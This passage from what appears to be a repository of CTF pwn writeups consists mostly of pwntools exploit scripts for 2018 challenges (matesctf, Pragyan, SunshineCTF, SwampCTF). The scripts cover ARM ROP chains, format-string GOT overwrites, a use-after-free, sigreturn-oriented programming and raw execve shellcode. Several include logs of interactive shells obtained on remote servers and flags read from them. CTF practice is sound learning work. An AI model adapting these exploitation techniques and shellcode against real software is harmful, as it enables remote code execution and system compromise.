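r.sendline("1") 20 | r.recvuntil("User name: ") 21 | r.send(username) 22 | pause() 23 | r.recvuntil("Password: ") 24 | r.send(password) 25 | 26 | def AddWhiteListMac(mac): 27 | r.sendline("3") 28 | r.recvuntil("MAC address: ") 29 | r.sendline(mac) 30 | return r.recvuntil("Your choice: ") 31 | 32 | def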
SetSSID(ssid): 33 | r.sendline("5") 34 | r.recvuntil("New SSID: ") 35 | r.send(ssid) 36 | return r.recvuntil("Your choice: ") 37 | 38 | def SetWirelessPassword(password): 39 | r.sendline("6") 40 | r.recvuntil("New Wireless Password: ") 41 | r.send(password) 42 | return r.recvuntil("Your choice: ") 43 | 44 | offset_system = 0x2c780 45 | offset_printf = 0x36fb4 46 | offset_sh = 0xca3e3 47 | BSS = 0x22500 48 | gadget = 0x000108ac # pop {r0, r1, r4, r8, fp, ip, sp, pc} 49 | MACLIST = 0x2204c 50 | SSID = 0x22008 51 | readStr = 0x108c4 52 | read_plt = 0x1070c 53 | printf_got = 0x21fa8 54 | puts_plt = 0x10754 55 | r.recvuntil("Your choice: ") 56 | Login("root\x00", "\x00") 57 | r.recvuntil("Your choice: ") 58 | payload = "F"*17 59 | AddWhiteListMac(payload) 60 | AddWhiteListMac(payload) 61 | AddWhiteListMac(payload) 62 | AddWhiteListMac("12"+p32(0xffffffff-1)) 63 | AddWhiteListMac("F"*12+"\x00"*5+"XX"+"F"*5) # overwrite canary 64 | payload = p32(BSS) # r7 65 | payload += p32(gadget) # pc 66 | payload += p32(MACLIST) # r0 67 | payload += p32(0x100) # r1 68 | payload += "1111" 69 | SetSSID(payload) 70 | payload = "1111" # r8 71 | payload += "1111" # fp 72 | payload += "1111" # ip 73 | payload += p32(SSID+0x50) # sp 74 | payload += p32(readStr+1) # pc 75 | SetWirelessPassword(payload) 76 | password = "B"*0x28+"F"*4 77 | password += "C"*4 78 | password += "1111" # r4 79 | password += p32(SSID) # r7 80 | password += "\x61\x0e" 81 | Login("\n", password) 82 | r.recvuntil("Wrong username or password!") 83 | pause() 84 | payload = "A"*4 85 | payload += p32(SSID+0x70) # r7 86 | payload += p32(gadget) # pc 87 | payload += p32(printf_got) # r0 88 | payload += p32(printf_got) # r1 89 | payload += p32(printf_got) # r4 90 | payload += p32(printf_got) # r8 91 | payload += p32(printf_got) # fp 92 | payload += p32(printf_got) # ip 93 | payload += p32(BSS) # sp 94 | payload += p32(puts_plt) # pc 95 | payload += "X"*4 96 | payload += p32(SSID) 97 | payload += "Z"*4 98 | payload += "A"*4 99 
| payload += p32(SSID+0x70) # r7 100 | payload += p32(gadget) # pc 101 | payload += p32(0x224f8) # r0 102 | payload += p32(0x100) # r1 103 | payload += p32(printf_got) # r4 104 | payload += p32(printf_got) # r8 105 | payload += p32(printf_got) # fp 106 | payload += p32(printf_got) # ip 107 | payload += p32(BSS) # sp 108 | payload += p32(readStr+1) # pc 109 | payload = payload.ljust(0x9f,"X") 110 | r.sendline(payload) 111 | 112 | printf = u32(r.recv(4)) 113 | libc = printf - offset_printf 114 | system = libc + offset_system 115 | sh = libc + offset_sh 116 | log.info("libc: %#x" % libc) 117 | log.info("printf: %#x" % printf) 118 | log.info("system: %#x" % system) 119 | log.info("sh: %#x" % sh) 120 | payload = p32(SSID+0x70) # r7 121 | payload += p32(gadget) # pc 122 | payload += p32(sh) # r0 123 | payload += p32(0x100) # r1 124 | payload += p32(printf_got) # r4 125 | payload += p32(printf_got) # r8 126 | payload += p32(printf_got) # fp 127 | payload += p32(printf_got) # ip 128 | payload += p32(BSS) # sp 129 | payload += p32(system) # pc 130 | r.sendline(payload) 131 | r.interactive() 132 | 133 | chall(sys.argv[1]) 134 | 135 | """ 136 | $ python xmodem.py 2 137 | [+] Opening connection to 42.117.243.201 on port 9999: Done 138 | [*] libc: 0x76e11001 139 | [*] printf: 0x76e47fb5 140 | [*] system: 0x76e3d781 141 | [*] sh: 0x76edb3e4 142 | [*] Switching to interactive mode 143 | x�v$ 144 | $ cd /home/xmodem 145 | $ cat flag 146 | matesctf{xmodem_ma_de^_in_VietNam} 147 | $ id 148 | uid=1004(xmodem) gid=1004(xmodem) groups=1004(xmodem) 149 | $ 150 | """ -------------------------------------------------------------------------------- /2018/pragyan/aes_enc_unbf/aes_enc_unbf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/pragyan/aes_enc_unbf/aes_enc_unbf -------------------------------------------------------------------------------- 
/2018/pragyan/aes_enc_unbf/aes_enc_unbf.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def aes_enc_unbf(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./aes_enc_unbf") 11 | raw_input("debug?") 12 | elif DEBUG=="2": 13 | HOST = '128.199.224.175' 14 | PORT = 33100 15 | r = remote(HOST,PORT) 16 | 17 | shellcode = "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x50\x50\x59\x5A\x89\xE3\x6A\x5B\x58\x34\x50\xCD\x80" 18 | __malloc_hook = 0x08230598 19 | __stack_prot = 0x0822EC98 20 | _libc_stack_end = 0x0822ECE8 21 | _dl_make_stack_executable = 0x081715D0 22 | main = 0x08048CE0 23 | pop_eax = 0x0804c906 24 | jmp_esp = 0x08174bec 25 | 26 | log.info('X: %#x' % (main>>16)) 27 | log.info('Y: %#x' % ((main&0xffff)-(main>>16))) 28 | fmt = "" 29 | fmt += p32(__stack_prot) 30 | fmt += p32(__malloc_hook+2) 31 | fmt += p32(__malloc_hook) 32 | fmt += "%7$n" 33 | fmt += "%" + str((main>>16) - 12) + "x" + "%8$hn" 34 | fmt += "%"+ str((main&0xffff)-((main>>16))) + "x" + "%9$hn" # *__malloc_hook = main 35 | fmt += "XXXX|%39$p|%41$p|YYYY" 36 | 37 | r.recvuntil("Enter message :- ") 38 | r.sendline(fmt) 39 | r.recvuntil("XXXX|") 40 | res = r.recvuntil("YYYY") 41 | address = res.split("|") 42 | canary = int(address[0],16) 43 | stack = int(address[1],16) 44 | log.info('canary: %#x' % canary) 45 | log.info('stack: %#x' % stack) 46 | 47 | fmt = "" 48 | fmt += p32(__stack_prot) 49 | fmt += "%259u"+"%7$hhn" # 0x822ec98 (__stack_prot) <- 0x7 50 | r.recvuntil("Enter message :- ") 51 | r.sendline(fmt) 52 | 53 | 54 | raw_input("?") 55 | fmt = "" 56 | fmt += p32(__malloc_hook) 57 | fmt += p32(__malloc_hook+1) 58 | fmt += p32(__malloc_hook+2) 59 | fmt += p32(__malloc_hook+3) 60 | fmt += "%"+str(0xff-15)+"u"+"%7$hhn" 61 | fmt += "%"+str(0x100)+"u"+"%8$hhn" 62 | fmt += "%"+str(0x200)+"u"+"%9$hhn" 63 | fmt += "%"+str(0x300)+"u"+"%10$hhn" # *__malloc_hook = 0 64 | fmt += 
"A"*0x43 65 | fmt += p32(canary) 66 | fmt += "B"*4 67 | fmt += p32(stack-0x5b8+4) 68 | fmt += p32(pop_eax) 69 | fmt += p32(_libc_stack_end) 70 | fmt += p32(_dl_make_stack_executable) 71 | fmt += p32(jmp_esp) 72 | fmt += shellcode 73 | r.recvuntil("Enter message :- ") 74 | r.sendline(fmt) 75 | r.interactive() 76 | 77 | aes_enc_unbf(sys.argv[1]) 78 | # pctf{th4t_m0m3n1-wh3n~f0rm41`SpiLls_0v3r} -------------------------------------------------------------------------------- /2018/pragyan/aes_enc_unbf/iv.aes: -------------------------------------------------------------------------------- 1 | DUMMYDUMMYDUMMYD -------------------------------------------------------------------------------- /2018/pragyan/aes_enc_unbf/key.aes: -------------------------------------------------------------------------------- 1 | DUMMYDUMMYDUMMYDUMMYDUMMYDUMMYDU -------------------------------------------------------------------------------- /2018/pragyan/police_academy/police_academy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/pragyan/police_academy/police_academy -------------------------------------------------------------------------------- /2018/pragyan/police_academy/police_academy.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def police_academy(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./police_academy") 11 | raw_input("debug?") 12 | elif DEBUG=="2": 13 | HOST = '128.199.224.175' 14 | PORT = 13000 15 | r = remote(HOST,PORT) 16 | 17 | payload = "kaiokenx20\x00" 18 | payload += "A"*(0x10-len(payload)) 19 | payload += "./"*((0x24-8)/2) 20 | payload += "flag.txt" 21 | r.sendline(payload) 22 | r.sendline("8") 23 | r.interactive() 24 | 25 | police_academy(sys.argv[1]) 26 | # pctf{bUff3r-0v3Rfl0wS`4r3.alw4ys-4_cl4SsiC} 
-------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/Hexalicious.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def hexalicious(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./hexalicious") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = 'chal1.sunshinectf.org' 11 | PORT = 20003 12 | r = remote(HOST,PORT) 13 | # log.info('system: %#x' % system) 14 | FLAG = 0x0804B080 15 | 16 | # fmt = "%33$d" 17 | fmt = "%16$s" 18 | DATA = 0x0804B0E4 19 | r.recvuntil("Hello random stranger, what shall I call you?") 20 | r.sendline(fmt) 21 | flag = "" 22 | for i in xrange(10): 23 | data = p32(FLAG+8*i) 24 | data += p32(DATA) 25 | r.recvuntil("[>] ") 26 | r.sendline("0") 27 | r.recvuntil("[>] ") 28 | r.sendline(data) 29 | r.recvuntil("As hex, your data looks like this: ") 30 | r.recvuntil("0x") 31 | res = r.recvuntil("\n")[:-1] 32 | print res 33 | flag+=res.decode("hex")[::-1] 34 | print flag 35 | break 36 | 37 | r.interactive() 38 | 39 | hexalicious(sys.argv[1]) 40 | # sun{hexalicious_definitions_make_them_bytes_go_crazy} -------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/flag.txt: -------------------------------------------------------------------------------- 1 | concavang 2 | -------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/hexalicious: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/Hexalicious/hexalicious -------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/libpwnableharness32.so: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/Hexalicious/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/UAF/libc.so.6 -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/libpwnableharness32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/UAF/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/UAF/uaf -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/uaf.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | import ctypes 5 | 6 | def uaf(DEBUG): 7 | if DEBUG=="1": 8 | r = process("./uaf") 9 | raw_input("debug?") 10 | elif DEBUG=="2": 11 | r = process("./uaf", env={"LD_PRELOAD":"./libc.so.6"}) 12 | raw_input("debug?") 13 | elif DEBUG=="3": 14 | HOST = 'chal1.sunshinectf.org' 15 | PORT = 20001 16 | r = remote(HOST,PORT) 17 | 18 | def create_array(array): 19 | r.sendline("1") 20 | r.recvuntil("How many integers?") 21 | r.sendline(str(len(array))) 22 | r.recvuntil(" integers:") 23 | r.sendline(" ".join(map(str,array))) 24 | r.recvuntil("ID of integer array: ") 25 | res = r.recvuntil("\n")[:-1] 26 | 
r.recvuntil("(>) ") 27 | return res 28 | 29 | def create_string(s): 30 | r.sendline("2") 31 | r.recvuntil("Enter a text string:") 32 | r.sendline(s) 33 | r.recvuntil("ID of text string: ") 34 | res = r.recvuntil("\n")[:-1] 35 | r.recvuntil("(>) ") 36 | return res 37 | 38 | def edit_array(addr, idx, new_value): 39 | r.sendline("3") 40 | r.recvuntil("Enter object ID:") 41 | r.sendline(str(addr)) 42 | r.recvuntil("Enter index to change:") 43 | r.sendline(str(idx)) 44 | r.recvuntil("Enter new value:") 45 | r.sendline(str(new_value)) 46 | r.recvuntil("(>) ") 47 | 48 | def show_array(addr): 49 | r.sendline("4") 50 | r.recvuntil("Enter object ID:") 51 | r.sendline(str(addr)) 52 | r.recvuntil("Integer array:\n") 53 | res = r.recvuntil("\n")[:-1] 54 | r.recvuntil("(>) ") 55 | return res 56 | 57 | def show_string(addr): 58 | r.sendline("5") 59 | r.recvuntil("Enter object ID:") 60 | r.sendline(str(addr)) 61 | r.recvuntil("Text string:\n") 62 | res = r.recvuntil("\n")[:-1] 63 | r.recvuntil("(>) ") 64 | return res 65 | 66 | def delete_array(addr): 67 | r.sendline("6") 68 | r.recvuntil("Enter object ID:") 69 | r.sendline(str(addr)) 70 | r.recvuntil("(>) ") 71 | 72 | def delete_string(addr): 73 | r.sendline("7") 74 | r.recvuntil("Enter object ID:") 75 | r.sendline(str(addr)) 76 | r.recvuntil("(>) ") 77 | 78 | size = 0x4 79 | strtol_got = 0x804A820 80 | strspn_got = 0x804a824 81 | strdup_got = 0x804A7F4 82 | free_got = 0x804a7f0 83 | arr1 = create_array([1]*0x11) 84 | arr1 = int(arr1) 85 | # print hex(arr1) 86 | arr2 = create_array([1]*0x11) 87 | arr2 = int(arr2) 88 | # print hex(arr2) 89 | 90 | str0 = create_string("/bin/sh") 91 | # print str0 92 | str1 = create_string("A"*size) 93 | # print hex(int(str1)) 94 | str2 = create_string("B"*size) 95 | str3 = create_string("C"*size) 96 | delete_string(str2) 97 | delete_string(str1) 98 | delete_string(str2) 99 | 100 | payload = p32(arr1-4) 101 | create_string(payload) 102 | create_string("E"*size) 103 | create_string("F"*size) 104 | 
payload = p32(strspn_got) 105 | 106 | create_string(payload) 107 | 108 | res = show_array(str(arr1)) 109 | # print res 110 | list_addr = res[1:-1].split(", ") 111 | # strtol =((0x800000000+(int(list_addr[0])>>8))&0xffffff)+0x7f000000 112 | # strtol = 0x800000000+int(list_addr[0]) 113 | strspn = 0x800000000+int(list_addr[0]) 114 | 115 | # print hex(strtol) 116 | # base_libc = strdup - 0x752a0 # libc-2.23.so 117 | # base_libc = free - 0x71470 # libc-2.23.so 118 | base_libc = strspn - 0x13df00 # libc-2.23.so 119 | # strspn = base_libc + 0x13df00 120 | calloc = base_libc + 0x71810 121 | system = base_libc + 0x3ada0 122 | log.info('base_libc: %#x' % base_libc) 123 | log.info('system: %#x' % system) 124 | # log.info('strtol: %#x' % strtol) 125 | log.info('strspn: %#x' % strspn) 126 | log.info('calloc: %#x' % calloc) 127 | delete_string(str1) 128 | delete_string(str2) 129 | delete_string(str1) 130 | payload = p32(arr2-4) 131 | create_string(payload) 132 | create_string("E"*size) 133 | create_string("F"*size) 134 | payload = p32(strspn_got+2) 135 | create_string(payload) 136 | raw_input("?") 137 | value = system&0xffff 138 | edit_array(arr1, 0, str(value)) 139 | value = ((calloc & 0xffff)*0x10000)+((system >> 2**4)&0xffff) 140 | # value = ((system >> 2**4)&0xffff) 141 | # print hex(calloc & 0xffff) 142 | print hex(value) 143 | edit_array(arr2, 0, str(value)) 144 | 145 | delete_string(str1) 146 | delete_string(str2) 147 | delete_string(str1) 148 | # raw_input("?") 149 | r.sendline("1") 150 | r.sendline("17") 151 | r.sendline("/bin/sh") 152 | 153 | r.interactive() 154 | 155 | uaf(sys.argv[1]) 156 | """ 157 | define ff 158 | telescope $ebp-0x1ac 2 159 | telescope $ebp-0x174 40 160 | fastbins 161 | end 162 | """ -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/.data: -------------------------------------------------------------------------------- 1 | concaheo 2 | 
-------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/flag.txt: -------------------------------------------------------------------------------- 1 | sun{ahihi} 2 | -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/libpwnableharness32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/logsearch/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/logs.txt: -------------------------------------------------------------------------------- 1 | concavang 2 | -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/logsearch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/logsearch/logsearch -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/logsearch.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def logsearch(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./logsearch") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = 'chal1.sunshinectf.org' 11 | PORT = 20008 12 | r = remote(HOST,PORT) 13 | 14 | 15 | r.recvuntil("Enter a search phrase: ") 16 | puts_plt = 0x08048640 17 | fclose_got = 0x8049D44 18 | strstr_got = 0x8049D38 19 | search_file = 0x08049D7C 20 | handle_connection = 0x080488F4 21 | offset = 87 22 | payload = fmtstr_payload(offset, {fclose_got : handle_connection}, write_size="short") 23 | r.sendline(payload) 24 | raw_input("?") 25 | payload = 
fmtstr_payload(offset, {strstr_got: puts_plt, search_file: 0x67616c66, search_file+4: 0x7478742e}, write_size="short") 26 | r.sendline(payload) 27 | r.interactive() 28 | 29 | logsearch(sys.argv[1]) 30 | """ 31 | sun{**_********_**_hunter2} 32 | """ -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/rot13/libc.so.6 -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/libpwnableharness32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/rot13/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/rot13: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/rot13/rot13 -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/rot13.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def rot13(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./rot13") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = 'chal1.sunshinectf.org' 11 | PORT = 20006 12 | r = remote(HOST,PORT) 13 | 14 | def r13(payload): 15 | return payload.encode("rot13") 16 | 17 | offset_strlen_got = 0x1fd4 18 | 19 | payload_leak = "|" 20 | payload_leak += "%"+str(0x153)+"$p" 21 | payload_leak += "|" 22 | payload_leak += "%"+str(0x15f)+"$p" 23 | payload_leak += "|" 24 | payload_leak = 
r13(payload_leak) 25 | 26 | r.recvuntil("Enter some text to be rot13 encrypted:") 27 | r.sendline(payload_leak) 28 | r.recvuntil("Rot13 encrypted data:") 29 | res = r.recvuntil("Enter some text to be rot13 encrypted:") 30 | leak = res.split("|") 31 | print leak 32 | 33 | codebase = int(leak[1],16)-0xa59 34 | __libc_start_main_ret = int(leak[2],16) 35 | base_libc = __libc_start_main_ret - 0x18637 # libc-2.23.so 36 | system = base_libc + 0x3ada0 37 | strlen_got = codebase + offset_strlen_got 38 | log.info('base_libc: %#x' % base_libc) 39 | log.info('system: %#x' % system) 40 | log.info('codebase: %#x' % codebase) 41 | log.info('strlen_got: %#x' % strlen_got) 42 | 43 | # raw_input("?") 44 | offset = 7 45 | payload = fmtstr_payload(offset, {strlen_got : system}, write_size="short") 46 | final_payload = payload 47 | final_payload = "" 48 | for i in payload: 49 | if ord(i) <= 128: 50 | final_payload += r13(i) 51 | else: 52 | final_payload += i 53 | r.sendline(final_payload) 54 | r.sendline("/bin/sh") 55 | 56 | r.interactive() 57 | 58 | rot13(sys.argv[1]) 59 | """ 60 | $ cat f* 61 | sun{q0hoy3_e0g13_1f_o3gg3e_gu4a_gu3_3a1tz4_z4pu1a3} 62 | """ -------------------------------------------------------------------------------- /2018/swampctf/Dungeon_Crawl/dungeon.py: -------------------------------------------------------------------------------- 1 | 2 | from pwn import * 3 | import time 4 | import sys 5 | 6 | def Dungeon(DEBUG): 7 | if DEBUG=="1": 8 | r = process("./level1") 9 | # r = process("./level5", env={"LD_PRELOAD":"./libc.so.6"}) 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | HOST = 'chal1.swampctf.com' 13 | PORT = 1337 14 | r = remote(HOST,PORT) 15 | 16 | def level1(): 17 | r.recvuntil("Access token please: ") 18 | r.sendline(str(252534)) 19 | 20 | def level2(): 21 | r.recvuntil("What is your party name? 
") 22 | payload = "A"*(0x88-0xC) 23 | payload += p32(0xCC07C9) 24 | r.sendline(payload) 25 | 26 | def level3(): 27 | goal = 0x0804862D 28 | r.recvuntil("Just a simple question...what is your favorite spell?") 29 | payload = "A"*0x84 30 | payload += "B"*4 31 | payload += p32(goal) 32 | r.sendline(payload) 33 | 34 | def level4(): 35 | goal = 0x0804A47C 36 | action = 73 37 | r.recvuntil("Choose an action: ") 38 | r.sendline(str(action)) 39 | r.recvuntil("Hey traveler, what is your name? ") 40 | payload = p32(goal)*(120/4) 41 | r.sendline(payload) 42 | 43 | def level5(): 44 | offset = 79 45 | offset2 = 105 46 | offset_one_gadget = 0xf1147 # execve("/bin/sh", rsp+0x70, environ) 47 | r.recvuntil("Choice [0 exit][1 small][2 large][3 format]: ") 48 | r.sendline("3") 49 | r.recvuntil("Path 3 - The possibilities are endless!\n") 50 | r.sendline("%71$p-%77$p-%79$p") 51 | res = r.recvline().replace("\n","").split("-") 52 | canary = int(res[0],16) 53 | __libc_start_main_ret = int(res[1],16) 54 | stack = int(res[2],16) 55 | base_libc = __libc_start_main_ret - 0x20830 56 | one_gadget = base_libc + offset_one_gadget 57 | log.info('canary: %#x' % canary) 58 | log.info('stack: %#x' % stack) 59 | log.info('stack rsp+0x70: %#x' % (stack-0x88)) 60 | log.info('__libc_start_main_ret: %#x' % __libc_start_main_ret) 61 | log.info('one_gadget: %#x' % one_gadget) 62 | log.info('base_libc: %#x' % base_libc) 63 | 64 | r.sendline("3") 65 | payload = "%"+str((stack-0x88)&0xffff)+"u"+"%"+str(offset)+"$hn" 66 | r.sendline(payload) 67 | 68 | r.sendline("3") 69 | payload = "%"+str(offset2)+"$n" 70 | r.sendline(payload) 71 | 72 | r.sendline("3") 73 | payload = "%"+str((stack-0x88+4)&0xffff)+"u"+"%"+str(offset)+"$hn" 74 | r.sendline(payload) 75 | 76 | r.sendline("3") 77 | payload = "%"+str(offset2)+"$n" 78 | r.sendline(payload) 79 | 80 | 81 | r.sendline("1") 82 | r.recvuntil("Path 1 - Give yourself an extra challenge :)\n") 83 | payload = "A"*(0x20-0x8) 84 | payload += p64(canary) 85 | payload += "B"*8 
86 | payload += p64(one_gadget) 87 | payload += "\x00"*(0x40-len(payload)) 88 | r.send(payload) 89 | 90 | 91 | level1() 92 | level2() 93 | level3() 94 | level4() 95 | level5() 96 | r.interactive() 97 | 98 | Dungeon(sys.argv[1]) 99 | """ 100 | $ python dungeon.py 2 101 | [+] Opening connection to chal1.swampctf.com on port 1337: Done 102 | ['0xc89f1d1180b25600', '0x7f4d6f04a830', '0x7ffdb9001228'] 103 | [*] canary: 0xc89f1d1180b25600 104 | [*] stack: 0x7ffdb9001228 105 | [*] stack rsp+0x70: 0x7ffdb90011a0 106 | [*] __libc_start_main_ret: 0x7f4d6f04a830 107 | [*] one_gadget: 0x7f4d6f11b147 108 | [*] base_libc: 0x7f4d6f02a000 109 | [*] Switching to interactive mode 110 | $ id 111 | uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) 112 | $ ls 113 | flag 114 | level1 115 | level2 116 | level3 117 | level4 118 | level5 119 | $ cat f* 120 | flag{I_SurV1v3d_th3_f1n4l_b0ss} 121 | """ -------------------------------------------------------------------------------- /2018/swampctf/Dungeon_Crawl/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Dungeon_Crawl/libc.so.6 -------------------------------------------------------------------------------- /2018/swampctf/Power_QWORD/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Power_QWORD/libc.so.6 -------------------------------------------------------------------------------- /2018/swampctf/Power_QWORD/power: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Power_QWORD/power -------------------------------------------------------------------------------- 
/2018/swampctf/Power_QWORD/power.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def power(DEBUG): 6 | 7 | if DEBUG=="1": 8 | t = 0.005 9 | r = process("./power") 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | r = process(['./power'], env={"LD_PRELOAD":"./libc.so.6"}) 13 | raw_input("debug?") 14 | elif DEBUG=="3": 15 | HOST = 'chal1.swampctf.com' 16 | PORT = 1999 17 | r = remote(HOST,PORT) 18 | 19 | shellcode64 = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 20 | offset_system = 0x45390 21 | offset_one_gadget = 0xf1147 # execve("/bin/sh", rsp+0x70, environ) 22 | 23 | r.recvuntil("Mage: Do you believe in such things? (yes/no): ") 24 | r.sendline("yes") 25 | r.recvuntil("0x") 26 | res= r.recv(12) 27 | system = int("0x"+res,16) 28 | one_gadget = system - offset_system + offset_one_gadget 29 | r.send(p64(one_gadget)) 30 | raw_input("?") 31 | r.sendline("A"*100) 32 | r.interactive() 33 | 34 | power(sys.argv[1]) 35 | """ 36 | $ python power.py 3 37 | [+] Opening connection to chal1.swampctf.com on port 1999: Done 38 | ? 
39 | [*] Switching to interactive mode 40 | ] 41 | and speak the Power QWord: sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: not found 42 | $ id 43 | uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) 44 | $ ls 45 | flag 46 | power 47 | $ cat f* 48 | flag{m4g1c_1s_4ll_ar0Und_u5} 49 | """ -------------------------------------------------------------------------------- /2018/swampctf/Syscaller_Lament/syscaller: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Syscaller_Lament/syscaller -------------------------------------------------------------------------------- /2018/swampctf/Syscaller_Lament/syscaller.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | context.arch = "amd64" 5 | 6 | def syscaller(DEBUG): 7 | 8 | if DEBUG=="1": 9 | r = process("./syscaller") 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | HOST = 'chal1.swampctf.com' 13 | PORT = 1800 14 | r = remote(HOST,PORT) 15 | 16 | sh = 0x400200 17 | _start = 0x4000E0 18 | syscall = 0x400104 19 | r.recvuntil("Hello and welcome to the Labyrinthe. 
Make your way or perish.") 20 | frame = SigreturnFrame() 21 | frame.rax = constants.SYS_mprotect 22 | frame.rdi = 0x400000 # address 23 | frame.rsi = 0x1000 # len 24 | frame.rdx = 7 # prot 25 | frame.rsp = sh 26 | frame.rip = syscall 27 | 28 | payload = p64(0x1) # r12 29 | payload += p64(0x2) # r11 30 | payload += p64(0x3) # rdi 31 | payload += p64(15) # rax = sys_sigreturn 32 | payload += p64(0x5) # rbx 33 | payload += p64(0x6) # rdx 34 | payload += p64(0x7) # rsi 35 | payload += p64(0x8) # rdi 36 | payload += str(frame) 37 | r.sendline(payload) 38 | sleep(2) 39 | payload = "/bin/sh\x00" #r12 40 | payload += p64(0) # r11 41 | payload += p64(0) # rdi 42 | payload += p64(59) # rax = sys_execve 43 | payload += p64(0) # rbx 44 | payload += p64(0) # rdx 45 | payload += p64(0) # rsi 46 | payload += p64(sh) # rdi 47 | r.sendline(payload) 48 | r.interactive() 49 | 50 | syscaller(sys.argv[1]) 51 | """ 52 | $ python syscaller.py 2 53 | [+] Opening connection to chal1.swampctf.com on port 1800: Done 54 | [*] Switching to interactive mode 55 | 56 | $ id 57 | uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) 58 | $ ls 59 | flag.txt 60 | syscaller 61 | $ cat f* 62 | flag{5me_5p3ls_R_m0r_pw3rfu1_th4n_0thrs} 63 | """ 64 | -------------------------------------------------------------------------------- /2019/Insomni'hack teaser 